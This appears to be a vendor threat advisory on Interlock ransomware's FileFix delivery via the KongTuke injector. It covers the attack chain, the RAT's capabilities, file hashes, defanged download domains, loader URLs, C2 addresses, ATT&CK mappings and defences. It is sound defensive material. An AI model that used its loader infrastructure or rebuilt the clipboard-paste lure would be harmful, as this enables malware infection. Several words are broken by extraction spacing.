Interlock Ransomware via FileFix

A newly observed wave of cyberattacks involving the Interlock ransomware has revealed a dangerous evolution in how attackers gain access to systems. Security researchers have identifi ed that Interlock has adopted a sophisticated technique known as “FileFix”, a deceptive method that tricks users into executing malicious code without triggering any visible warnings. This change in strategy refl ects the growing trend among cybercriminals to rely on social engineering rather than traditional exploit-based approaches.

The FileFix method masks malicious instructions as harmless fi le paths and prompts users to interact with Windows components like File Explorer. Once activated, the attack silently installs a remote access trojan (RAT) that spies on the system, collects sensitive data, and prepares the environment for a ransomware payload. Notably, Interlock has previously targeted high-profi le institutions, and this new tactic makes their attacks harder to detect and block. The evolution of this method signals a concerning development in ransomware delivery mechanisms and underscores the increasing need for user awareness and robust endpoint defenses.

Interlock ransomware has recently adopted a stealthier delivery method known as FileFix, which relies heavily on user deception rather than exploiting software vulnerabilities. This approach marks a shift in how the ransomware is propagated, using social engineering techniques to bypass conventional defenses. Delivered through compromised websites and a web injector called KongTuke, the malware chain culminates in the installation of a remote access trojan (RAT) that enables data exfiltration, system control, and eventual ransomware deployment.

Initial Access via FileFix

Interlock ransomware has incorporated a stealthy payload delivery mechanism known as FileFix, an evolution of the widely abused ClickFix method. Originally demonstrated by security researcher mr.d0x, FileFix weaponizes legitimate Windows UI components—such as File Explorer and HTA (HTML Applications)—to trick users into executing malicious code disguised as harmless fi le paths. Unlike traditional methods that rely on exploits or malicious attachments, FileFix focuses on deceiving the user through clipboard manipulation and interface spoofing.

Payload Delivery via KongTuke Web Injector

The initial infection vector in recent Interlock campaigns involves compromised websites hosting the KongTuke injector (also referred to as LandUpdate808). Victims are led through fake CAPTCHA-style verification steps, followed by a prompt to paste clipboard content into the Run dialog or File Explorer. This technique, consistent with ClickFix/FileFix tactics, executes obfuscated PowerShell commands that download and launch malware.

Interlock RAT Variants (Node.js and PHP)

The attack chain culminates in the deployment of an Interlock Remote Access Trojan (RAT). Early campaigns in May used a Node.js-based variant, while campaigns in June and July transitioned to a PHP-based version. This malware is fetched from infrastructure such as trycloudfl are[.]com and executed without triggering standard Windows security prompts. Once active, the RAT harvests system and network information, exfi ltrating it in structured JSON format to an external command and control (C2) server.

Post-Infection Capabilities

Following installation, the Interlock RAT enables the threat actor to:
● Enumerate Active Directory structures
● Search for backups
● Scan local and network directories
● Investigate domain controllers
● Establish persistence through Windows Registry run keys
● Execute remote commands and facilitate lateral movement via RDP

Ransomware Deployment and Victim Profile

Interlock ransomware was first observed in September 2024 and has been linked to high-profile breaches, including Texas Tech University, DaVita, and Kettering Health. While earlier campaigns relied on ClickFix, the switch to FileFix indicates an intentional pivot to stealthier and more deceptive techniques. The campaign is still active and may expand, given the ease with which the FileFix method bypasses user defenses.

File Hashes

Windows Interlock ransomware:
● a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642

FreeBSD Interlock ransomware:
● 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
● e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
● f00a7652ad70ddb6871eeef5ece0972cf68f3d9a6b7acfbffd33f82558ab50e

Backdoor (pre-ransomware) sample:
● e9ff4d40aeec2ff9d2886c7e7aea7634d8997a14ca3740645fd3101808cc187b

Domains

JS or RAT download domains:
● diff-beats-belize-chapter.trycloudfl are[.]com
● zoloft-indianapolis-riders-convinced.trycloudfl are[.]com
● bidder-horizontal-wildlife-invoice.trycloudfl are[.]com
● name-kw-papua-booking.trycloudfl are[.]com
● bristol-weed-martin-know.trycloudfl are[.]com
● musicians-forestry-operation-angels.trycloudfl are[.]com
● peter-secrets-diana-yukon.trycloudfl are[.]com

Compromised web loader links:
● andrixdesign.com/kzz/c1ub.zip
● .js loaders: talentohc.com/js.php, telback.com/5t5y.js

Command and Control (C2) Endpoints

● 23.227.203[.]162
● 65.109.226[.]176
● 65.38.120[.]47
● 23.95.182[.]59
● 195.201.21[.]34
● 159.223.46[.]184
● 216.245.184[.]181
● 212.237.217[.]182
● 168.119.96[.]41
● 216.245.184[.]170
● 65.108.80[.]58
● 84.200.24[.]41
● 206.206.123[.]65
● 49.12.102[.]206
● 193.149.180[.]158
● 85.239.52[.]252
● 5.252.177[.]228
● 80.87.206[.]189
● 212.104.133[.]72
● 140.82.14[.]117
● 64.94.84[.]85
● 49.12.69[.]80
● 96.62.214[.]11
● 177.136.225[.]153
● 188.34.195[.]44

MITRE ATT&CK Techniques

● T1204.002 – User Execution: Malicious File
● T1059.001 – Command and Scripting Interpreter: PowerShell
● T1547.001 – Boot or Logon AutoStart Execution: Registry Run Keys
● T1027 – Obfuscated Files or Information
● T1071.001 – Application Layer Protocol: Web Protocols
● T1082 – System Information Discovery
● T1018 – Remote System Discovery
● T1482 – Domain Trust Discovery
● T1003 – OS Credential Dumping
● T1210 – Exploitation of Remote Services
● T1021.001 – Remote Services: Remote Desktop Protocol

1. Educate users on FileFix-style attacks

Train employees to recognize deceptive prompts asking them to paste text into File Explorer or the Run dialog. Emphasize that legitimate processes should never require manual input of fi le paths copied from unknown websites.

2. Block clipboard-driven attack vectors

Implement endpoint protection mechanisms or group policies to monitor or restrict the execution of clipboard-injected PowerShell commands. This reduces exposure to FileFix and similar social engineering tactics.

3. Filter access to compromised or suspicious web sources

Monitor and restrict traffi c to domains like trycloudfl are.com or known loader URLs used by KongTuke injectors. Web proxy or DNS fi ltering solutions can help intercept connections to suspicious infrastructure.

4. Audit PowerShell usage across endpoints

Continuously monitor PowerShell execution logs, especially for commands involving downloads or obfuscated syntax. Alert on abnormal or user-initiated PowerShell activity that bypasses standard workflows.

5. Detect registry-based persistence

Scan for unauthorized or abnormal entries under common persistence paths such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run. This helps identify post-infection mechanisms used by Interlock RAT.

6. Review user privileges and restrict RDP access

Limit administrative privileges and enforce RDP access controls to reduce lateral movement possibilities, as the Interlock RAT is capable of using RDP post-infection.

Bleeping Computer. (2025, July 14). Interlock ransomware adopts filefix method to deliver malware. BleepingComputer. https://www.bleepingcomputer.com/news/security/interlock-ransomware-adopts-filefix-method-to-deliver-malware/

Fortinet. (2024, November 29). Ransomware roundup: Interlock. Fortinet Blog. https://www.fortinet.com/blog/threat-research/ransomware-roundup-interlock

GuidePoint Security. (2025, May 28). Interesting Interlock Intrusion: How Interlock achieves encryption. GuidePoint Security. https://www.guidepointsecurity.com/blog/interesting-interlock-intrusion-how-interlock-achieves-encryption/

Sleep well, we got you covered.